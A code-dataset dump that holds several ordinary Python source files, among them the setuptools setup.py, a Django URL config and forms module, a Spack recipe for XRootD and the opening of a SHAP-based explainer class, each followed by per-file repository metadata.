# Sources live next to setup.py, so no alternate source root is needed.
src_root = None

from distutils.util import convert_path

# Execute setuptools/command/__init__.py in an isolated namespace to read its
# __all__ list without importing the (not-yet-installed) package itself.
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
    exec(init_file.read(), command_ns)
SETUP_COMMANDS = command_ns['__all__']

import setuptools

# No plain scripts are installed; console entry points are used instead.
scripts = []
def _gen_console_scripts():
    """Yield console_scripts entry-point definitions for easy_install.

    Always yields the plain ``easy_install`` script.  The version-suffixed
    ``easy_install-X.Y`` script is suppressed when either opt-out environment
    variable is set to a non-empty value other than "0": Gentoo distributions
    manage the python-version-specific scripts themselves, so those platforms
    define an environment variable to suppress the creation of the
    version-specific scripts.
    """
    yield "easy_install = setuptools.command.easy_install:main"
    var_names = (
        'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
        'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
    )
    if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
        return
    # Bug fix: sys.version[:3] truncates two-digit minor versions
    # (Python 3.10 -> "3.1"); derive "X.Y" from sys.version_info instead.
    shortver = '{}.{}'.format(*sys.version_info[:2])
    yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
           .format(shortver=shortver))
console_scripts = list(_gen_console_scripts())

# The README doubles as the long_description shown on PyPI.
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
    long_description = readme_file.read()

# Non-Python files shipped inside the setuptools package.
package_data = {
    'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}

# Escape hatch to force inclusion of the Windows-only launcher binaries
# when cross-building from a non-Windows host.
force_windows_specific_files = (
    os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
    not in (None, "", "0")
)
# Native Windows, Jython-on-Windows, or the env-var override above.
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
        or force_windows_specific_files:
    package_data.setdefault('setuptools', []).extend(['*.exe'])
    package_data.setdefault('setuptools.command', []).extend(['*.xml'])

# Conditionally pull in build/test helpers only for the commands that need
# them, keyed off the command names present on the command line.
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
setup_params = dict(
name="setuptools",
version="20.10.1",
description="Easily download, build, install, upgrade, and uninstall "
"Python packages",
author="Python Packaging Authority",
author_email="distutils-sig@python.org",
long_description=long_description,
keywords="CPAN PyPI distutils eggs package management",
url="https://github.com/pypa/setuptools",
src_root=src_root,
packages=setuptools.find_packages(exclude=['*.tests']),
package_data=package_data,
py_modules=['easy_install'],
zip_safe=True,
entry_points={
"distutils.commands": [
"%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
for cmd in SETUP_COMMANDS
],
"distutils.setup_keywords": [
"eager_resources = setuptools.dist:assert_string_list",
"namespace_packages = setuptools.dist:check_nsp",
"extras_require = setuptools.dist:check_extras",
"install_requires = setuptools.dist:check_requirements",
"tests_require = setuptools.dist:check_requirements",
"setup_requires = setuptools.dist:check_requirements",
"entry_points = setuptools.dist:check_entry_points",
"test_suite = setuptools.dist:check_test_suite",
"zip_safe = setuptools.dist:assert_bool",
"package_data = setuptools.dist:check_package_data",
"exclude_package_data = setuptools.dist:check_package_data",
"include_package_data = setuptools.dist:assert_bool",
"packages = setuptools.dist:check_packages",
"dependency_links = setuptools.dist:assert_string_list",
"test_loader = setuptools.dist:check_importable",
"test_runner = setuptools.dist:check_importable",
"use_2to3 = setuptools.dist:assert_bool",
"convert_2to3_doctests = setuptools.dist:assert_string_list",
"use_2to3_fixers = setuptools.dist:assert_string_list",
"use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
],
"egg_info.writers": [
"PKG-INFO = setuptools.command.egg_info:write_pkg_info",
"requires.txt = setuptools.command.egg_info:write_requirements",
"entry_points.txt = setuptools.command.egg_info:write_entries",
"eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
"namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
"top_level.txt = setuptools.command.egg_info:write_toplevel_names",
"depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
"dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
],
"console_scripts": console_scripts,
"setuptools.installation":
['eggsecutable = setuptools.command.easy_install:bootstrap'],
},
classifiers=textwrap.dedent("""
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.6
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Programming Language :: Python :: 3.5
Topic :: Software Development :: Libraries :: Python Modules
Topic :: System :: Archiving :: Packaging
Topic :: System :: Systems Administration
Topic :: Utilities
""").strip().splitlines(),
extras_require={
"ssl:sys_platform=='win32'": "wincertstore==0.2",
"certs": "certifi==2016.2.28",
},
dependency_links=[
'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
],
scripts=[],
tests_require=[
'setuptools[ssl]',
'pytest>=2.8',
] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
setup_requires=[
] + sphinx + pytest_runner + wheel,
)
# Only invoke setup() when executed as a script, so the module can be
# imported (e.g. by release tooling) without side effects.
if __name__ == '__main__':
    dist = setuptools.setup(**setup_params)
| 40.240964 | 123 | 0.655689 |
import io
import os
import sys
import textwrap
os.chdir(os.path.dirname(os.path.abspath(__file__)))
src_root = None
from distutils.util import convert_path
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
exec(init_file.read(), command_ns)
SETUP_COMMANDS = command_ns['__all__']
import setuptools
scripts = []
def _gen_console_scripts():
yield "easy_install = setuptools.command.easy_install:main"
var_names = (
'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
)
if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
return
yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
.format(shortver=sys.version[:3]))
console_scripts = list(_gen_console_scripts())
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
long_description = readme_file.read()
package_data = {
'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}
force_windows_specific_files = (
os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
not in (None, "", "0")
)
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
or force_windows_specific_files:
package_data.setdefault('setuptools', []).extend(['*.exe'])
package_data.setdefault('setuptools.command', []).extend(['*.xml'])
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
setup_params = dict(
name="setuptools",
version="20.10.1",
description="Easily download, build, install, upgrade, and uninstall "
"Python packages",
author="Python Packaging Authority",
author_email="distutils-sig@python.org",
long_description=long_description,
keywords="CPAN PyPI distutils eggs package management",
url="https://github.com/pypa/setuptools",
src_root=src_root,
packages=setuptools.find_packages(exclude=['*.tests']),
package_data=package_data,
py_modules=['easy_install'],
zip_safe=True,
entry_points={
"distutils.commands": [
"%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
for cmd in SETUP_COMMANDS
],
"distutils.setup_keywords": [
"eager_resources = setuptools.dist:assert_string_list",
"namespace_packages = setuptools.dist:check_nsp",
"extras_require = setuptools.dist:check_extras",
"install_requires = setuptools.dist:check_requirements",
"tests_require = setuptools.dist:check_requirements",
"setup_requires = setuptools.dist:check_requirements",
"entry_points = setuptools.dist:check_entry_points",
"test_suite = setuptools.dist:check_test_suite",
"zip_safe = setuptools.dist:assert_bool",
"package_data = setuptools.dist:check_package_data",
"exclude_package_data = setuptools.dist:check_package_data",
"include_package_data = setuptools.dist:assert_bool",
"packages = setuptools.dist:check_packages",
"dependency_links = setuptools.dist:assert_string_list",
"test_loader = setuptools.dist:check_importable",
"test_runner = setuptools.dist:check_importable",
"use_2to3 = setuptools.dist:assert_bool",
"convert_2to3_doctests = setuptools.dist:assert_string_list",
"use_2to3_fixers = setuptools.dist:assert_string_list",
"use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
],
"egg_info.writers": [
"PKG-INFO = setuptools.command.egg_info:write_pkg_info",
"requires.txt = setuptools.command.egg_info:write_requirements",
"entry_points.txt = setuptools.command.egg_info:write_entries",
"eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
"namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
"top_level.txt = setuptools.command.egg_info:write_toplevel_names",
"depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
"dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
],
"console_scripts": console_scripts,
"setuptools.installation":
['eggsecutable = setuptools.command.easy_install:bootstrap'],
},
classifiers=textwrap.dedent("""
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.6
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Programming Language :: Python :: 3.5
Topic :: Software Development :: Libraries :: Python Modules
Topic :: System :: Archiving :: Packaging
Topic :: System :: Systems Administration
Topic :: Utilities
""").strip().splitlines(),
extras_require={
"ssl:sys_platform=='win32'": "wincertstore==0.2",
"certs": "certifi==2016.2.28",
},
dependency_links=[
'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
],
scripts=[],
tests_require=[
'setuptools[ssl]',
'pytest>=2.8',
] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
setup_requires=[
] + sphinx + pytest_runner + wheel,
)
if __name__ == '__main__':
dist = setuptools.setup(**setup_params)
| true | true |
f72ed504ee5e9ff505fb85110a267350133c3f82 | 1,023 | py | Python | 4_utilization/utilization/urls.py | LIkelion-at-KOREATECH/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | null | null | null | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | """utilization URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
# URL routes: admin site, landing page, and django-allauth auth endpoints.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', accounts.views.index, name="index"),
    path('accounts/', include('allauth.urls')),
    # Serve user-uploaded media via Django; static() only emits routes when
    # DEBUG is True, so this is a development-time convenience.
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 36.535714 | 77 | 0.723363 | from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', accounts.views.index, name="index"),
path('accounts/', include('allauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| true | true |
f72ed5096c5ea0ad4c05289c8b57172cf413b939 | 665 | py | Python | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 2 | 2019-07-07T00:36:47.000Z | 2020-05-11T10:48:42.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 5 | 2019-02-09T09:58:06.000Z | 2021-04-30T12:59:09.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 1 | 2020-05-09T18:50:48.000Z | 2020-05-09T18:50:48.000Z | import setuptools
# Package metadata and installation configuration for z5-tracker.
setuptools.setup(
    name='z5-tracker',
    version='1.2.1',
    author='Feneg',
    description='Helper program for Ocarina of Time randomiser',
    url='https://www.github.com/feneg/z5-tracker',
    packages=setuptools.find_packages(),
    include_package_data=True,
    classifiers=[
        'Development Status :: 4 - Beta',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.6',
        'Topic :: Games/Entertainment',
        'Topic :: Utilities'],
    entry_points={
        # Two launcher aliases (hyphenated and plain) for the same GUI entry
        # point; gui_scripts avoids a console window on Windows.
        'gui_scripts': (
            'z5-tracker = z5tracker.main:main',
            'z5tracker = z5tracker.main:main')}
)
| 30.227273 | 64 | 0.607519 | import setuptools
setuptools.setup(
name='z5-tracker',
version='1.2.1',
author='Feneg',
description='Helper program for Ocarina of Time randomiser',
url='https://www.github.com/feneg/z5-tracker',
packages=setuptools.find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Topic :: Games/Entertainment',
'Topic :: Utilities'],
entry_points={
'gui_scripts': (
'z5-tracker = z5tracker.main:main',
'z5tracker = z5tracker.main:main')}
)
| true | true |
f72ed55ad5ef38ef972e01b4b0f6447434a2d27e | 1,831 | py | Python | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | null | null | null | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 22 | 2020-11-27T19:05:34.000Z | 2020-12-05T16:50:43.000Z | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 1 | 2020-11-27T21:08:15.000Z | 2020-11-27T21:08:15.000Z | """
This module contains all forms used in the teacher Views
"""
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
    """ModelForm for an MSPLine whose values are all supplied by the view.

    Every field is rendered as a hidden input, so the form acts as a
    pre-filled submission (e.g. an approve/confirm button) rather than an
    editable form.
    """

    class Meta:
        model = MSPLine
        fields = [
            "type",
            "msp",
            "comment",
            "materials",
        ]
        widgets = {
            "msp": HiddenInput(),
            "comment": HiddenInput(),
            "materials": MultipleHiddenInput(),
            "type": HiddenInput(),
        }
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
    """ModelForm for suggesting alternative study materials on an MSPLine.

    ``msp`` and ``type`` are fixed hidden inputs; ``materials`` is a
    select2-backed multi-select searching across books and scientific
    articles, wrapped so the user can create a new material inline via the
    material_management create view.
    """

    class Meta:
        model = MSPLine
        fields = [
            "type",
            "msp",
            "materials",
            "comment",
        ]
        widgets = {
            "msp": HiddenInput(),
            "type": HiddenInput(),
            "materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
                queryset=StudyMaterialEdition.objects.all(),
                # Fields matched (case-insensitively) by the select2 search box.
                search_fields=[
                    "name__icontains",
                    "book__ISBN__icontains",
                    "book__author__icontains",
                    "book__year_of_publishing__icontains",
                    "scientificarticle__DOI__icontains",
                    "scientificarticle__author__icontains",
                    "scientificarticle__year_of_publishing__icontains",
                ]
            ), reverse_lazy('material_management:material.create')),
            # TODO: Convert this to a teacher:book.create view when it exists.
        }
| 30.516667 | 78 | 0.588749 |
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"comment",
"materials",
]
widgets = {
"msp": HiddenInput(),
"comment": HiddenInput(),
"materials": MultipleHiddenInput(),
"type": HiddenInput(),
}
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"materials",
"comment",
]
widgets = {
"msp": HiddenInput(),
"type": HiddenInput(),
"materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
queryset=StudyMaterialEdition.objects.all(),
search_fields=[
"name__icontains",
"book__ISBN__icontains",
"book__author__icontains",
"book__year_of_publishing__icontains",
"scientificarticle__DOI__icontains",
"scientificarticle__author__icontains",
"scientificarticle__year_of_publishing__icontains",
]
), reverse_lazy('material_management:material.create')),
}
| true | true |
f72ed60ac026397d696947159bb11c0de6f0aad9 | 5,247 | py | Python | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Xrootd(CMakePackage):
    """The XROOTD project aims at giving high performance, scalable fault
    tolerant access to data repositories of many kinds."""

    homepage = "http://xrootd.org"
    url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"

    # Known releases, newest first.  Note 4.12.3 is marked preferred, so it is
    # chosen by default over the newer 5.0.1.
    version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
    version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
    version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
    version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
    version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
    version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
    version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
    version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
    version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
    version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
    version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
    version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
    version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
    version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
    version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
    version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
    version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
    version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
    version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
    version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
    version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
    version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')

    # Build options exposed to the user.
    variant('http', default=True,
            description='Build with HTTP support')
    variant('python', default=False,
            description='Build pyxroot Python extension')
    variant('readline', default=True,
            description='Use readline')
    variant('cxxstd',
            default='11',
            values=('98', '11', '14', '17'),
            multi=False,
            description='Use the specified C++ standard when building.')

    # 4.7.0+ hardcodes -std=c++0x (stripped in patch() below), so a C++98
    # build is not possible for those releases.
    conflicts('cxxstd=98', when='@4.7.0:')

    depends_on('bzip2')
    depends_on('cmake@2.6:', type='build')
    depends_on('libxml2', when='+http')
    depends_on('uuid', when="@4.11.0:")
    depends_on('openssl')
    depends_on('python', when='+python')
    depends_on('readline', when='+readline')
    depends_on('xz')
    depends_on('zlib')
    extends('python', when='+python')
    # Older releases need a patch for the optional Python bindings to build.
    patch('python-support.patch', level=1, when='@:4.8.99+python')

    def patch(self):
        """Remove hardcoded -std=c++0x flag
        """
        # Lets the cxxstd variant's flag (added in setup_build_environment)
        # take effect instead of the upstream-pinned standard.
        if self.spec.satisfies('@4.7.0:'):
            filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')

    def cmake_args(self):
        """Translate the Spack variants into XRootD's CMake options."""
        spec = self.spec
        options = [
            '-DENABLE_HTTP:BOOL={0}'.
            format('ON' if '+http' in spec else 'OFF'),
            '-DENABLE_PYTHON:BOOL={0}'.
            format('ON' if '+python' in spec else 'OFF'),
            '-DENABLE_READLINE:BOOL={0}'.
            format('ON' if '+readline' in spec else 'OFF'),
            '-DENABLE_CEPH:BOOL=OFF'
        ]
        # see https://github.com/spack/spack/pull/11581
        if '+python' in self.spec:
            options.append('-DPYTHON_EXECUTABLE=%s' %
                           spec['python'].command.path)
        return options

    def setup_build_environment(self, env):
        # Map the cxxstd variant onto the active compiler's flag for that
        # standard; legal values are constrained by the variant declaration.
        cxxstdflag = ''
        if self.spec.variants['cxxstd'].value == '98':
            cxxstdflag = self.compiler.cxx98_flag
        elif self.spec.variants['cxxstd'].value == '11':
            cxxstdflag = self.compiler.cxx11_flag
        elif self.spec.variants['cxxstd'].value == '14':
            cxxstdflag = self.compiler.cxx14_flag
        elif self.spec.variants['cxxstd'].value == '17':
            cxxstdflag = self.compiler.cxx17_flag
        else:
            # The user has selected a (new?) legal value that we've
            # forgotten to deal with here.
            # NOTE(review): 'tty' is assumed to be provided by
            # `from spack import *` — confirm it is in scope in this Spack
            # version; otherwise this error path would raise a NameError.
            tty.die(
                "INTERNAL ERROR: cannot accommodate unexpected variant ",
                "cxxstd={0}".format(self.spec.variants['cxxstd'].value))
        if cxxstdflag:
            env.append_flags('CXXFLAGS', cxxstdflag)
| 46.848214 | 112 | 0.684772 |
from spack import *
class Xrootd(CMakePackage):
homepage = "http://xrootd.org"
url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"
version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')
variant('http', default=True,
description='Build with HTTP support')
variant('python', default=False,
description='Build pyxroot Python extension')
variant('readline', default=True,
description='Use readline')
variant('cxxstd',
default='11',
values=('98', '11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
conflicts('cxxstd=98', when='@4.7.0:')
depends_on('bzip2')
depends_on('cmake@2.6:', type='build')
depends_on('libxml2', when='+http')
depends_on('uuid', when="@4.11.0:")
depends_on('openssl')
depends_on('python', when='+python')
depends_on('readline', when='+readline')
depends_on('xz')
depends_on('zlib')
extends('python', when='+python')
patch('python-support.patch', level=1, when='@:4.8.99+python')
def patch(self):
if self.spec.satisfies('@4.7.0:'):
filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')
def cmake_args(self):
spec = self.spec
options = [
'-DENABLE_HTTP:BOOL={0}'.
format('ON' if '+http' in spec else 'OFF'),
'-DENABLE_PYTHON:BOOL={0}'.
format('ON' if '+python' in spec else 'OFF'),
'-DENABLE_READLINE:BOOL={0}'.
format('ON' if '+readline' in spec else 'OFF'),
'-DENABLE_CEPH:BOOL=OFF'
]
if '+python' in self.spec:
options.append('-DPYTHON_EXECUTABLE=%s' %
spec['python'].command.path)
return options
def setup_build_environment(self, env):
cxxstdflag = ''
if self.spec.variants['cxxstd'].value == '98':
cxxstdflag = self.compiler.cxx98_flag
elif self.spec.variants['cxxstd'].value == '11':
cxxstdflag = self.compiler.cxx11_flag
elif self.spec.variants['cxxstd'].value == '14':
cxxstdflag = self.compiler.cxx14_flag
elif self.spec.variants['cxxstd'].value == '17':
cxxstdflag = self.compiler.cxx17_flag
else:
# forgotten to deal with here.
tty.die(
"INTERNAL ERROR: cannot accommodate unexpected variant ",
"cxxstd={0}".format(self.spec.variants['cxxstd'].value))
if cxxstdflag:
env.append_flags('CXXFLAGS', cxxstdflag)
| true | true |
f72ed67b5fe1b20f3cdf6654c9891e80bdd774e0 | 2,002 | py | Python | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | 2 | 2019-06-26T21:31:03.000Z | 2019-06-27T16:59:58.000Z | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | """
provide global explanation methods
author: Xiaoqi
date: 2019.10.29
"""
from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
    """Explains a fitted black-box model at the global (dataset-wide) level."""

